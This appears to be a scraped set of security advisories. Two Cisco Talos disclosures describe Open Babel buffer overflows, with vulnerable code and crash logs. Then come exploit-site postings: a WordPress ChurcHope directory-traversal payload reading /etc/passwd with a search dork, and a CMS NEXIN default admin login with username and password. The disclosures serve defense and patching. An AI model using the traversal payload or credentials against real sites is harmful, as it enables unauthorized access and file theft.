An out-of-bounds write vulnerability exists in the MOL2 format attribute and value functionality of Open Babel 3.1.1 and master commit 530dbfa3. A specially crafted malformed file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.

**SUMMARY**

An out-of-bounds write vulnerability exists in the MOL2 format attribute and value functionality of Open Babel 3.1.1 and master commit 530dbfa3. A specially crafted malformed file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Open Babel 3.1.1  
Open Babel master commit 530dbfa3

**PRODUCT URLS**

Open Babel - https://openbabel.org/

**CVSSv3 SCORE**

8.1 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-119 - Improper Restriction of Operations within the Bounds of a Memory Buffer

**DETAILS**

Open Babel is a popular library for converting chemical file formats, currently supporting about 130 different file formats. It implements bindings for several programming languages. Because of the nature of the library, and since there are many online chemical format converters and molecule viewers which might be using Open Babel in their backend for parsing and conversion, we consider this software as potentially accessible via network.

Open Babel ships a simple converter application called obabel that can be used to trigger the issue described in this advisory. obabel supports -i and -o parameters, which select the input and output formats to perform the conversion. obabel supports multiple input and output files (as does the Open Babel library itself): this technically allows multiple vulnerabilities to trigger in sequence, which in turn could make some vulnerabilities easier to exploit. In this advisory, however, we focus on only one input file and a corresponding output file.

When a single input file and output file are supplied, obabel.cpp records the input and output formats (if supplied), and calls OBConversion::FullConvert in obconversion.cpp. Inside this function, there’s a call to OpenAndSetFormat, which uses FormatFromExt to derive the input format from the filename extension if no -i parameter was supplied. Similarly, OpenInAndOutFiles can be used to derive both input and output formats from the filename extensions when none are supplied.

Depending on how the obabel application is invoked, different paths could take place. However, eventually, pInFormat and pOutFormat (of base class OBFormat) objects are allocated, which are instances of the classes that implement the selected input and output formats.

The code then proceeds with a call to OBConversion::Convert, which eventually leads to calling pInFormat->ReadMolecule and pOutFormat->WriteMolecule.

In this advisory, we describe an issue in the mol2 file format (formats/mol2format.cpp) when parsing an input file via ReadMolecule.

        bool MOL2Format::ReadMolecule(OBBase* pOb, OBConversion* pConv)
        {
    
          ...
    [1]   char buffer[BUFF_SIZE];
          char *comment = nullptr;
          string str,str1;
          vector<string> vstr;
          int len;
    
          ...
    
          for (;;)
            {
    [2]       if (!ifs.getline(buffer,BUFF_SIZE))
                return(false);
    [3]       if (pConv->IsOption("c", OBConversion::INOPTIONS) != nullptr && EQn(buffer, "###########", 10))
                {
    [4]           char attr[32], val[32];
    [5]           sscanf(buffer, "########## %[^:]:%s", attr, val);
                  OBPairData *dd = new OBPairData;
                  dd->SetAttribute(attr);
                  dd->SetValue(val);
                  dd->SetOrigin(fileformatInput);
                  mol.SetData(dd);
                }
              if (EQn(buffer,"@<TRIPOS>MOLECULE",17))
                break;
            }
    

The function defines several variables. We’re especially interested in buffer at \[1\], a char buffer of size 32768 which is used to read lines in the input file. At \[2\] a line is read, which is expected to contain the string “###########” \[3\]. In order to enter the if at \[3\], the option “c” also needs to be used (-ac from the commandline).

At \[4\], two char arrays are defined, of size 32. At \[5\], sscanf is used with a “%s” format specifier. “%s” alone does not constrain the read length, which can go well over 32 bytes. This allows an out-of-bounds write on the stack from both attr and val buffers. Depending on how the code is compiled and the stack is laid out, this issue can lead to arbitrary code execution.

**Crash Information**

    $ ./bin/obabel -i mol2 scanf.mol2 -o sdf -ac
    =================================================================
    ==1191000==ERROR: AddressSanitizer: stack-buffer-overflow on address 0xfffdb130 at pc 0xf7a09be5 bp 0xfffda618 sp 0xfffda1f0
    WRITE of size 30001 at 0xfffdb130 thread T0
        #0 0xf7a09be4 in scanf_common ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors_format.inc:342
        #1 0xf7a0a6f9 in __interceptor___isoc99_vsscanf ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:1531
        #2 0xf7a0a77c in __interceptor___isoc99_sscanf ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:1554
        #3 0xf4315454 in OpenBabel::MOL2Format::ReadMolecule(OpenBabel::OBBase*, OpenBabel::OBConversion*) ./src/formats/mol2format.cpp:186
        #4 0xf751a915 in OpenBabel::OBMoleculeFormat::ReadChemObjectImpl(OpenBabel::OBConversion*, OpenBabel::OBFormat*) ./src/obmolecformat.cpp:102
        #5 0xf63c358c in OpenBabel::OBMoleculeFormat::ReadChemObject(OpenBabel::OBConversion*) ./include/openbabel/obmolecformat.h:116
        #6 0xf72a204e in OpenBabel::OBConversion::Convert() ./src/obconversion.cpp:545
        #7 0xf72c717a in OpenBabel::OBConversion::Convert(std::istream*, std::ostream*) ./src/obconversion.cpp:481
        #8 0xf72cf4f3 in OpenBabel::OBConversion::FullConvert(std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > >&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > >&) ./src/obconversion.cpp:1514
        #9 0x565594ea in main ./tools/obabel.cpp:370
        #10 0xf77923b4 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
        #11 0xf779247e in __libc_start_main_impl ../csu/libc-start.c:389
        #12 0x5655c356 in _start (./bin/obabel+0x7356)
    
    Address 0xfffdb130 is located in stack of thread T0 at offset 2448 in frame
        #0 0xf43148ef in OpenBabel::MOL2Format::ReadMolecule(OpenBabel::OBBase*, OpenBabel::OBConversion*) ./src/formats/mol2format.cpp:156
    
      This frame has 91 object(s):
        [32, 33) '<unknown>'
        [48, 49) '<unknown>'
        [64, 65) '<unknown>'
        [80, 81) '<unknown>'
        [96, 97) '<unknown>'
        [112, 113) '<unknown>'
        [128, 129) '<unknown>'
        [144, 145) '<unknown>'
        [160, 161) '<unknown>'
        [176, 177) '<unknown>'
        [192, 193) '<unknown>'
        [208, 209) '<unknown>'
        [224, 225) '<unknown>'
        [240, 241) '<unknown>'
        [256, 260) 'natoms' (line 199)
        [272, 276) 'nbonds' (line 199)
        [288, 292) 'resnum' (line 269)
        [304, 308) 'ri' (line 385)
        [320, 324) 'aid' (line 410)
        [336, 340) 'num' (line 410)
        [352, 356) 'charge' (line 420)
        [368, 372) 'start' (line 438)
        [384, 388) 'end' (line 438)
        [400, 404) '<unknown>'
        [416, 420) '<unknown>'
        [432, 436) '<unknown>'
        [448, 452) '<unknown>'
        [464, 468) '<unknown>'
        [480, 484) '<unknown>'
        [496, 500) '__dnew'
        [512, 516) '__guard'
        [528, 532) '__guard'
        [544, 548) '<unknown>'
        [560, 564) '<unknown>'
        [576, 580) '<unknown>'
        [592, 596) '<unknown>'
        [608, 612) '<unknown>'
        [624, 628) '__guard'
        [640, 644) '__dnew'
        [656, 660) '__guard'
        [672, 676) '__dnew'
        [688, 692) '__guard'
        [704, 708) '__dnew'
        [720, 724) '__guard'
        [736, 740) '<unknown>'
        [752, 756) '<unknown>'
        [768, 772) '<unknown>'
        [784, 788) '<unknown>'
        [800, 804) '<unknown>'
        [816, 820) '__guard'
        [832, 836) 'd' (line 155)
        [848, 852) 'd' (line 155)
        [864, 868) 'd' (line 155)
        [880, 888) 'x' (line 267)
        [912, 920) 'y' (line 267)
        [944, 952) 'z' (line 267)
        [976, 984) 'pcharge' (line 267)
        [1008, 1020) 'vstr' (line 171)
        [1040, 1052) 'atom' (line 474)
        [1072, 1084) 'bit' (line 481)
        [1104, 1116) 'atom' (line 499)
        [1136, 1148) 'bitA' (line 503)
        [1168, 1180) 'bitB' (line 512)
        [1200, 1212) 'bond' (line 533)
        [1232, 1244) 'matom' (line 564)
        [1264, 1288) 'str' (line 170)
        [1328, 1352) 'str1' (line 170)
        [1392, 1416) '<unknown>'
        [1456, 1480) '<unknown>'
        [1520, 1544) 'v' (line 265)
        [1584, 1608) '<unknown>'
        [1648, 1672) '<unknown>'
        [1712, 1736) '<unknown>'
        [1776, 1800) '<unknown>'
        [1840, 1864) '<unknown>'
        [1904, 1928) '<unknown>'
        [1968, 1992) 'nextrti' (line 404)
        [2032, 2056) '<unknown>'
        [2096, 2120) '<unknown>'
        [2160, 2184) 'title' (line 543)
        [2224, 2248) '<unknown>'
        [2288, 2312) '<unknown>'
        [2352, 2384) 'attr' (line 185)
        [2416, 2448) 'val' (line 185)
        [2480, 2588) 'atom' (line 266) <== Memory access at offset 2448 partially underflows this variable
        [2624, 2832) 'errorMsg' (line 343) <== Memory access at offset 2448 partially underflows this variable
        [2896, 3104) 'errorMsg' (line 541) <== Memory access at offset 2448 partially underflows this variable
        [3168, 35936) 'buffer' (line 168) <== Memory access at offset 2448 partially underflows this variable
        [36192, 68960) 'temp_type' (line 268)
        [69216, 101984) 'resname' (line 268)
        [102240, 135008) 'atmid' (line 268)
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
          (longjmp and C++ exceptions *are* supported)
    SUMMARY: AddressSanitizer: stack-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors_format.inc:342 in scanf_common
    Shadow bytes around the buggy address:
      0x3fffb5d0: f2 f2 00 00 00 f2 f2 f2 f2 f2 00 00 00 f2 f2 f2
      0x3fffb5e0: f2 f2 00 00 00 f2 f2 f2 f2 f2 00 00 00 f2 f2 f2
      0x3fffb5f0: f2 f2 00 00 00 f2 f2 f2 f2 f2 00 00 00 f2 f2 f2
      0x3fffb600: f2 f2 00 00 00 f2 f2 f2 f2 f2 00 00 00 f2 f2 f2
      0x3fffb610: f2 f2 00 00 00 f2 f2 f2 f2 f2 00 00 00 00 f2 f2
    =>0x3fffb620: f2 f2 00 00 00 00[f2]f2 f2 f2 00 00 00 00 00 00
      0x3fffb630: 00 00 00 00 00 00 00 04 f2 f2 f2 f2 00 00 00 00
      0x3fffb640: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x3fffb650: 00 00 00 00 00 00 f2 f2 f2 f2 f2 f2 f2 f2 00 00
      0x3fffb660: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x3fffb670: 00 00 00 00 00 00 00 00 f2 f2 f2 f2 f2 f2 f2 f2
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
    

**VENDOR RESPONSE**

Since the maintainer of this software did not release a patch during the 90 day window specified in our policy, we have now decided to release the information regarding this vulnerability, to make users of the software aware of this problem. See Cisco’s Coordinated Vulnerability Disclosure Policy for more information: https://tools.cisco.com/security/center/resources/vendor\_vulnerability\_policy.html

**TIMELINE**

2022-12-20 - Initial Vendor Contact  
2023-01-12 - Vendor Disclosure  
2023-07-21 - Public Release

Discovered by Claudio Bozzato of Cisco Talos.

CVE-2022-43607: TALOS-2022-1664 || Cisco Talos Intelligence Group

An out-of-bounds write vulnerability exists in the CSR format title functionality of Open Babel 3.1.1 and master commit 530dbfa3. A specially crafted malformed file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.

**SUMMARY**

An out-of-bounds write vulnerability exists in the CSR format title functionality of Open Babel 3.1.1 and master commit 530dbfa3. A specially crafted malformed file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Open Babel 3.1.1  
Open Babel master commit 530dbfa3

**PRODUCT URLS**

Open Babel - https://openbabel.org/

**CVSSv3 SCORE**

9.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-120 - Buffer Copy without Checking Size of Input (‘Classic Buffer Overflow’)

**DETAILS**

Open Babel is a popular library for converting chemical file formats, currently supporting about 130 different file formats. It implements bindings for several programming languages. Because of the nature of the library, and since there are many online chemical format converters and molecule viewers which might be using Open Babel in their backend for parsing and conversion, we consider this software as potentially accessible via network.

Open Babel ships a simple converter application called obabel that can be used to trigger the issue described in this advisory. obabel supports -i and -o parameters, which select the input and output formats to perform the conversion. obabel supports multiple input and output files (as does the Open Babel library itself): this technically allows multiple vulnerabilities to trigger in sequence, which in turn could make some vulnerabilities easier to exploit. In this advisory, however, we focus on only one input file and a corresponding output file.

When a single input file and output file are supplied, obabel.cpp records the input and output formats (if supplied), and calls OBConversion::FullConvert in obconversion.cpp. Inside this function, there’s a call to OpenAndSetFormat, which uses FormatFromExt to derive the input format from the filename extension if no -i parameter was supplied. Similarly, OpenInAndOutFiles can be used to derive both input and output formats from the filename extensions when none are supplied.

Depending on how the obabel application is invoked, different paths could actually take place. Eventually, pInFormat and pOutFormat (of base class OBFormat) objects are allocated, which are instances of the classes that implement the selected input and output formats.

The code then proceeds with a call to OBConversion::Convert, which eventually leads to calling pInFormat->ReadMolecule and pOutFormat->WriteMolecule.

In this advisory, we describe an issue in the CSR file format (formats/CSRformat.cpp.cpp) when writing an output file via WriteMolecule.

        bool CSRFormat::WriteMolecule(OBBase* pOb, OBConversion* pConv)
        {
          OBMol* pmol = dynamic_cast<OBMol*>(pOb);
          if (pmol == nullptr)
            return false;
    
          //Define some references so we can use the old parameter names
          ostream &ofs = *pConv->GetOutStream();
          OBMol &mol = *pmol;
    
          //  if (FirstTime)
          if(pConv->GetOutputIndex()==1)
            {
              WriteCSRHeader(ofs,mol);
              //FirstTime = false;
              MolCount=1;
            }
    
    [1]   WriteCSRCoords(ofs,mol);
          MolCount++;
    
          return(true);
        }
    

Let’s follow the call to WriteCSRCoords at \[1\].

        void CSRFormat::WriteCSRCoords(ostream &ofs,OBMol &mol)
        {
          int the_size,jconf;
          double x,y,z,energy;
          char title[100];
          char *tag;
    
          the_size = sizeof(int) + sizeof(double) + (80 * sizeof(char));
    
          jconf = 1;
          energy = -2.584565;
    
    [2]   snprintf(title, 80, "%s:%d",mol.GetTitle(),MolCount);
    [3]   tag = PadString(title,80);
    
          WriteSize(the_size,ofs);
          ofs.write((char*)&jconf,sizeof(int));
          ofs.write((char*)&energy,sizeof(double));
          ofs.write(tag,80*sizeof(char));
          WriteSize(the_size,ofs);
    
          WriteSize(mol.NumAtoms()*sizeof(double),ofs);
    

At \[2\], the molecule’s title is retrieved, and the title buffer is filled. Then PadString is called, passing title and 80 as size \[3\].

        char* CSRFormat::PadString(char *input, int size)
        {
          char *output;
    
    [4]   output = new char[size];
          memset(output, ' ', size);
    [5]   strncpy(output, input, strlen(input));
          output[ size - 1] = '\0';
          return(output);
        }
    

At \[4\], a new char array of size size is allocated, and at \[5\] it is filled with input using strncpy. The maximum size passed to strncpy is not related to the destination buffer size. Rather, it’s the length of the input (that is, the title), which is potentially controlled by the input file. If a long title (longer than 80 characters) is supplied, an out-of-bounds write on the heap will happen, which can lead to arbitrary code execution.

**Crash Information**

    $ ./bin/obabel -i caccrt strncpy.oobw.caccrt_csr -o csr
    =================================================================
    ==1329606==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xf560ed24 at pc 0xf79ff8c4 bp 0xffffb9e8 sp 0xffffb5c0
    WRITE of size 169 at 0xf560ed24 thread T0
        #0 0xf79ff8c3 in __interceptor_strncpy ../../../../src/libsanitizer/asan/asan_interceptors.cpp:470
        #1 0xf4f3b6a4 in OpenBabel::CSRFormat::PadString(char*, int) ./src/formats/CSRformat.cpp:192
        #2 0xf4f3b7d0 in OpenBabel::CSRFormat::WriteCSRHeader(std::ostream&, OpenBabel::OBMol&) ./src/formats/CSRformat.cpp:105
        #3 0xf4f3c86a in OpenBabel::CSRFormat::WriteMolecule(OpenBabel::OBBase*, OpenBabel::OBConversion*) ./src/formats/CSRformat.cpp:89
        #4 0xf7516072 in OpenBabel::OBMoleculeFormat::WriteChemObjectImpl(OpenBabel::OBConversion*, OpenBabel::OBFormat*) ./src/obmolecformat.cpp:174
        #5 0xf63c355c in OpenBabel::OBMoleculeFormat::WriteChemObject(OpenBabel::OBConversion*) ./include/openbabel/obmolecformat.h:120
        #6 0xf72a23e6 in OpenBabel::OBConversion::Convert() ./src/obconversion.cpp:607
        #7 0xf72c717a in OpenBabel::OBConversion::Convert(std::istream*, std::ostream*) ./src/obconversion.cpp:481
        #8 0xf72cf4f3 in OpenBabel::OBConversion::FullConvert(std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > >&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > >&) ./src/obconversion.cpp:1514
        #9 0x565594ea in main ./tools/obabel.cpp:370
        #10 0xf77923b4 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
        #11 0xf779247e in __libc_start_main_impl ../csu/libc-start.c:389
        #12 0x5655c356 in _start (./bin/obabel+0x7356)
    
    0xf560ed24 is located 0 bytes to the right of 100-byte region [0xf560ecc0,0xf560ed24)
    allocated by thread T0 here:
        #0 0xf7a58bb3 in operator new[](unsigned int) ../../../../src/libsanitizer/asan/asan_new_delete.cpp:98
        #1 0xf4f3b67c in OpenBabel::CSRFormat::PadString(char*, int) ./src/formats/CSRformat.cpp:190
        #2 0xf4f3b7d0 in OpenBabel::CSRFormat::WriteCSRHeader(std::ostream&, OpenBabel::OBMol&) ./src/formats/CSRformat.cpp:105
        #3 0xf4f3c86a in OpenBabel::CSRFormat::WriteMolecule(OpenBabel::OBBase*, OpenBabel::OBConversion*) ./src/formats/CSRformat.cpp:89
        #4 0xf7516072 in OpenBabel::OBMoleculeFormat::WriteChemObjectImpl(OpenBabel::OBConversion*, OpenBabel::OBFormat*) ./src/obmolecformat.cpp:174
        #5 0xf63c355c in OpenBabel::OBMoleculeFormat::WriteChemObject(OpenBabel::OBConversion*) ./include/openbabel/obmolecformat.h:120
        #6 0xf72a23e6 in OpenBabel::OBConversion::Convert() ./src/obconversion.cpp:607
        #7 0xf72c717a in OpenBabel::OBConversion::Convert(std::istream*, std::ostream*) ./src/obconversion.cpp:481
        #8 0xf72cf4f3 in OpenBabel::OBConversion::FullConvert(std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > >&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > >&) ./src/obconversion.cpp:1514
        #9 0x565594ea in main ./tools/obabel.cpp:370
        #10 0xf77923b4 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/asan/asan_interceptors.cpp:470 in __interceptor_strncpy
    Shadow bytes around the buggy address:
      0x3eac1d50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x3eac1d60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x3eac1d70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x3eac1d80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x3eac1d90: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
    =>0x3eac1da0: 00 00 00 00[04]fa fa fa fa fa fa fa fa fa fd fd
      0x3eac1db0: fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa
      0x3eac1dc0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
      0x3eac1dd0: fd fa fa fa fa fa fa fa fa fa fd fd fd fd fd fd
      0x3eac1de0: fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa fa
      0x3eac1df0: fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
    

**Exploit Proof of Concept**

To show how to control the title and trigger this vulnerability, let’s use the “Cacao Cartesian format” as input, to easily choose a title which is independent from the input filename:

        bool CacaoFormat::ReadMolecule(OBBase* pOb, OBConversion* pConv)
        {
    
          OBMol* pmol = pOb->CastAndClear<OBMol>();
          if (pmol == nullptr)
            return false;
    
          //Define some references so we can use the old parameter names
          istream &ifs = *pConv->GetInStream();
          OBMol &mol = *pmol;
    [6]   mol.SetTitle( pConv->GetTitle()); //default title is the filename
    
          char buffer[BUFF_SIZE];
          int natoms;
          double A,B,C,Alpha,Beta,Gamma;
          matrix3x3 m;
    
    [7]   ifs.getline(buffer,BUFF_SIZE);
    [8]   mol.SetTitle(buffer);
          ifs.getline(buffer,BUFF_SIZE);
    [9]   sscanf(buffer,"%d",&natoms);
          ...
    

This format has a default title taken from the filename \[6\]. However, the title can be freely chosen at \[7, 8\], in order to use long titles for easier exploitation. At \[9\] we should specify at least 1 atom, to make sure WriteMolecule is called, and satisfy additional fields in this specific input format, in order to eventually trigger the vulnerability in CSRFormat.

**VENDOR RESPONSE**

Since the maintainer of this software did not release a patch during the 90 day window specified in our policy, we have now decided to release the information regarding this vulnerability, to make users of the software aware of this problem. See Cisco’s Coordinated Vulnerability Disclosure Policy for more information: https://tools.cisco.com/security/center/resources/vendor\_vulnerability\_policy.html

**TIMELINE**

2022-12-20 - Initial Vendor Contact  
2023-01-12 - Vendor Disclosure  
2023-07-21 - Public Release

Discovered by Claudio Bozzato of Cisco Talos.

CVE-2022-41793: TALOS-2022-1667 || Cisco Talos Intelligence Group

WordPress ChurcHope Responsive Themes version 4.7.x suffers from a directory traversal vulnerability.

**WordPress ChurcHope Responsive Themes 4.7.x Directory Traversal**

Posted Jul 21, 2023

Authored by indoushka

WordPress ChurcHope Responsive Themes version 4.7.x suffers from a directory traversal vulnerability.

tags | exploit, file inclusion

SHA-256 | 5725a62c968e651e09b1218973491c6cf875301d455e111d6a9f075de9cbe5f8

Download | Favorite | View

**WordPress ChurcHope Responsive Themes 4.7.x Directory Traversal**

    ====================================================================================================================================| # Title     : WordPress - ChurcHope Responsive Themes 4.7.x Directory Traversal Vulnerability                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               | | # Vendor    : http://themeforest.net/item/churchope-responsive-wordpress-theme/2708562                                           |  | # Dork      : "/wp-content/themes/churchope/lib/"                                                                                |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /wp-content/themes/churchope/lib/downloadlink.php?file=../../../../../../../../../etc/passwd[+] http://127.0.0.1/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../../../../../../etc/passwdGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,734)
*   Arbitrary (16,154)
*   BBS (2,859)
*   Bypass (1,733)
*   CGI (1,025)
*   Code Execution (7,236)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,334)
*   DoS (23,363)
*   Encryption (2,365)
*   Exploit (51,626)
*   File Inclusion (4,209)
*   File Upload (967)
*   Firewall (821)
*   Info Disclosure (2,755)
*   Intrusion Detection (890)
*   Java (3,034)
*   JavaScript (851)
*   Kernel (6,641)
*   Local (14,428)
*   Magazine (586)
*   Overflow (12,664)
*   Perl (1,423)
*   PHP (5,138)
*   Proof of Concept (2,337)
*   Protocol (3,583)
*   Python (1,531)
*   Remote (30,664)
*   Root (3,575)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,636)
*   Security Tool (7,874)
*   Shell (3,176)
*   Shellcode (1,212)
*   Sniffer (894)
*   Spoof (2,196)
*   SQL Injection (16,306)
*   TCP (2,397)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,710)
*   Web (9,621)
*   Whitepaper (3,748)
*   x86 (961)
*   XSS (17,862)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,993)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,793)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (349)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,237)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,597)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,755)
*   UNIX (9,267)
*   UnixWare (186)
*   Windows (6,565)
*   Other

WordPress ChurcHope Responsive Themes 4.7.x Directory Traversal

CMS NEXIN version 2.0 appears to leave default credentials installed after installation.

**CMS NEXIN 2.0 Insecure Settings**

Posted Jul 21, 2023

Authored by indoushka

CMS NEXIN version 2.0 appears to leave default credentials installed after installation.

tags | exploit

SHA-256 | 25b10702af932a169c8f962ba428cb35c1dcfb81a0c4d0c73e21de4f9e2d2054

Download | Favorite | View

**CMS NEXIN 2.0 Insecure Settings**

    ====================================================================================================================================| # Title     : CMS NEXIN engine v2.0 Insecure Settings Vulnerability                                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit)                                               || # Vendor    : http://www.composeit.hu/                                                                                           |  | # Dork      : NEXIN engine v2.0                                                                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] appears to leave a default administrative account in place post installation.[+] Panel : http://wlugashotelcom/admin/[+] User : root & pass : job314Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,734)
*   Arbitrary (16,154)
*   BBS (2,859)
*   Bypass (1,733)
*   CGI (1,025)
*   Code Execution (7,236)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,334)
*   DoS (23,363)
*   Encryption (2,365)
*   Exploit (51,626)
*   File Inclusion (4,209)
*   File Upload (967)
*   Firewall (821)
*   Info Disclosure (2,755)
*   Intrusion Detection (890)
*   Java (3,034)
*   JavaScript (851)
*   Kernel (6,641)
*   Local (14,428)
*   Magazine (586)
*   Overflow (12,664)
*   Perl (1,423)
*   PHP (5,138)
*   Proof of Concept (2,337)
*   Protocol (3,583)
*   Python (1,531)
*   Remote (30,664)
*   Root (3,575)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,636)
*   Security Tool (7,874)
*   Shell (3,176)
*   Shellcode (1,212)
*   Sniffer (894)
*   Spoof (2,196)
*   SQL Injection (16,306)
*   TCP (2,397)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,710)
*   Web (9,621)
*   Whitepaper (3,748)
*   x86 (961)
*   XSS (17,862)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,993)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,793)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (349)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,237)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,597)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,755)
*   UNIX (9,267)
*   UnixWare (186)
*   Windows (6,565)
*   Other

CMS NEXIN 2.0 Insecure Settings

Buzzy News Viral Lists Polls and Videos version 2.0 appears to leave default credentials installed after installation.

**Buzzy News Viral Lists Polls And Videos 2.0 Insecure Settings**

Posted Jul 21, 2023

Authored by indoushka

Buzzy News Viral Lists Polls and Videos version 2.0 appears to leave default credentials installed after installation.

tags | exploit

SHA-256 | ef0029a51004a0f4fd1207577f144340dffe6a0657f6ace9160fd98579a7d596

Download | Favorite | View

**Buzzy News Viral Lists Polls And Videos 2.0 Insecure Settings**

